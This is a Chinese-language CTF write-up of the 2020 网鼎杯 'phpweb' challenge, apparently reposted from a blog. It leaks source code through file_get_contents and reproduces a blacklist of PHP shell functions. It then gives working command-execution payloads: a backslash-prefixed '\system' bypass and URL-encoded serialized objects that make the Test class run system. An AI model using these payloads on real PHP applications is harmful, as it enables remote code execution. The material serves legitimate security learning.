目錄

方法一：

方法二：

---

?

知識點：

1）黑名單取巧繞過

2）PHP的file_get_contents函數使用

3）PHP序列化與反序列化構造

訪問靶機，觀察頁面，開始時首先加載了一張圖片，隨后刷新回顯時間，并且網頁每隔一段時間會刷新一次，頻率大概五秒一次

F12查看源碼，和觀察的一樣，setTimeout("document.form1.submit()",5000)每隔五秒鐘將會提交一次form1，然后是一串時間字符串2021-10-20 12:14:50 pm

注意：重點是靶機內的form1表單，index.php用post方式提交了兩個參數，func和p。func的值為date，p值Y-m-d h:i:s a

分析：接收到func和p，執行PHP內的date函數和格式化的Y-m-d h:i:s a，然后輸出結果。既然這樣，猜想一下在PHP內，執行$func="date"，肯定是沒有問題的，但是如果提交的不是date，而是system，或exec呢？

不妨用php內的md5函數測試一下，123經過md5加密后的值為202cb962ac59075b964b07152d234b70，如果成功執行回顯在網頁上，猜測就正確

構造測試paylaod：?func=md5&p=123

做個代碼執行？被攔截了，可以fuzz查看哪些函數被黑名單

這里可以利用file_get_contents獲取index.php的源碼，如下：

file_get_contents(path):讀取path路徑下文件的內容

果然定義了一個disable_fun，然后巴拉巴拉一堆黑名單，代碼審計

<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);//調調用傳遞函數，并返回函數運行的結果（本例中即為執行$func($p)）$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {//非空$func = strtolower($func);//轉小寫if (!in_array($func,$disable_fun)) {//判斷是否存在黑名單echo gettime($func, $p);//如果不存在則調用gettime，把funchep傳入}else {die("Hacker...");//報錯}}?>

這里有兩種解法，一種是像大部分wp一樣構造序列化得flag，出題人大概也是這個意圖，另外一種解法比較巧取

方法一：

首先判斷是否存在與黑名單，php內的" \ "在做代碼執行的時候，會識別特殊字符串，繞過黑名單

payload：?func=\system&p=ls /

常用命令：

system('ls') : 列舉當前目錄下的所有文件

system("find / -name flag")：查找所有文件名匹配flag的文件

payload：?func=\system&p=find / -name flag*

payload：?func=\system&p=cat /tmp/flagoefiu4r93

方法二：

這種方法就是大部分答案寫的反序列化得flag手段

首先看下剛才index.php源碼內的一串代碼

class Test {
? ? ?? var $p = "Y-m-d h:i:s a";//定義p和func
? ? ?? var $func = "date";
? ? ?? function __destruct() {//對象被創建時自動調用
? ? ? ? ?? if ($this->func != "") {
? ? ? ? ? ? ?? echo gettime($this->func, $this->p);
? ? ? ? ?? }
}

如果用反序列化的方式調用system呢，提交的func為unserialize，p為序列化后的字符串，然后反序列化test類

<?php ? class Test{ public $func; public $p; } ? $ganyu=new Test(); $ganyu->func="system"; $ganyu->p="ls -alh /"; ? echo urlencode(serialize($ganyu)); ?>

構造查看根目錄的payload，由于以p提交的為序列化內容，func需設置為unserialize：

?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A9%3A%22ls+-alh+%2F%22%3B%7D

然后就是構造查找flag文件的payload

<?phpclass Test{ public $func; public $p; }$ganyu=new Test(); $ganyu->func="system"; $ganyu->p="find / -name flag*";echo urlencode(serialize($ganyu)); ?>

最后構造查詢flag的payload得到flag

<?phpclass Test{ public $func; public $p; }$ganyu=new Test(); $ganyu->func="system"; $ganyu->p="cat /tmp/flagoefiu4r93";echo urlencode(serialize($ganyu)); ?>

?func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3Bs%3A22%3A%22cat+%2Ftmp%2Fflagoefiu4r93%22%3B%7D

總結

以上是生活随笔為你收集整理的[网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。